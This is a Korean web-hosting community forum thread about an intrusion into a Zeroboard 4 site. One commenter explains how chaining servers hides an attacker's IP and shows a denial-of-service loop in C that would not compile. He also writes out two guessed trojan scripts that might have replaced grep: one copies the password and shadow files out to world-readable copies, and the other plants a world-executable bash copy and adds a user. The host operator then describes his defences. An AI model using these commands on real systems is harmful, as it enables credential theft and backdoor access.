여기에서 디지문호스팅에 대한 호불호를 논하셔도 좋고 일상 다반사에 관한 이야기를 올리셔도 좋습니다. 정치/종교적 색채가 너무 짙거나 광고/스팸성 게시물만 제외하곤 모두 환영합니다.
인도네시아짓이 아닌듯.... 미국쪽이나 그런것같네여
서버를 여러개 경유하면 추적이 안되는걸로 알고 있어요...
예를들어
해커가 있고 A란 컴터가 있고, B란 컴터도 있습니다. 그리고 또 목표 컴퓨터(서버)가 있습니다.
대충 Telnet으로 A를 경유하고 A에서 telnet명령을 써서 B에 접속을 하고 B에서 Telnet을 써서 목표컴터에 침투하면
사실상 B컴퓨터의 IP가 로그에 남죠.
만약 원격접속(윈도 자체에 있음)으로 A에 들어가서 또 거기서 원격접속으로 B에들어가서 목표컴터에 웹 크랙을 하면 그래도 B컴터 아이피가 남습니다.
제로보드 4를 크랙해서 백도어를 심을수 있었던건.... 아무래도....
제로보드의 파일(lib.php등등)이 패치가 안된것같다는 의심이 드네여....
글구... php로된 인덱스를 파괴한 크랙 스크립트는 밑에 꺼랑 비슷할거라 생각드네요.
제로보드가 '/홈페이지 전체경로/zb4/'이면 [unlink("../index.php")]가 쓰여있었을겁니다.
제가 .... 한번해본적이 있어서 ㅎㅎ(...)
그리고... 메모리를 과다하게 넘치게 만드는 소스는 ... malloc만 쓸줄 알면 된다는 ㅋ
#include <malloc.h>
#include <stdio.h>
int main()
{
char buf[];
for(;;)
{
buf=malloc(10000000) /* 10000kb(10MB)씩 점유시켜서 흘러넘치게 만든다 */
}
}
포멧이 진행된 코드는 ..... 저도 모르겟네여 ㅡㅡ;
그리구 명령어를 조작하는 방법은.....
grep을 실행하니 sigtax error가뜨셧다고 하셨는데여....
그건 아마도.... /usr/sbin/에 가짜 파일을 넣은듯 하네여....
grep이란 파일에 이런 스크립트로 채워져있었을수도 ;;;
cp /bin/bash /tmp/bashx
cd /tmp
chmod 777 bashx <-- 누구나 사용가능하게 함.
adduser hakc <-- 사용자 추가 (레드햇 계열에선 adduser, useradd인 경우도 있음)
chuser bashx -u hakc <-- 이게 맞는지 모르겟음.... ( 소유자 바꿈 )
cd /root/
echo sigtax error
이렇게 되어있었거나....
cp /etc/passwd /tmp/pw
cp /etc/shadow /tmp/shadow
cd /tmp
chmod 777 pw
chmod 777 shadow
cd /root/
echo sigtax error
이런식으로 암호파일이나 쉐도파일이나 루트 쉘(백도어)을 따내려던 수작이었을수도...
근데... 파티션이 날아 갔다니.... 이런거( 위에 보여준 2개 스크립트 ) 맹글어놓은 사람.... 허탈하겟군요 ㅎㅎㅡㅡ;
프락시를 경유한 사실이란 것 쯤은 알고 있었습니다. 똑같은 계정에 10개 정도 되는 IP로 공격이 들어오고 있었으니까요. 프락시를 수시로 바꾸어 가며 만행을 시도한 것 같네요.
제로보드4는 최신 버전으로 패치가 이미 다 되어 있는 상태인데도 뚫고 들어오네요.
제로보드4 체제로 계속 나가려면 뚫릴 가능성에서 완전 해방되긴 힘들 듯 싶습니다. 수시로 모니터링하며 접근 시도가 들어오면 해당 IP를 차단하는 걸로 대응하는 수 밖에 없을 것 같네요. 트립와이어, mod_security와 같은 무료 솔루션을 최대한 활용하고 있습니다.
파티션 날릴 수 있던 건 아마도 마스터부트레코드에 스크립트를 심어서 그런 것 같네요.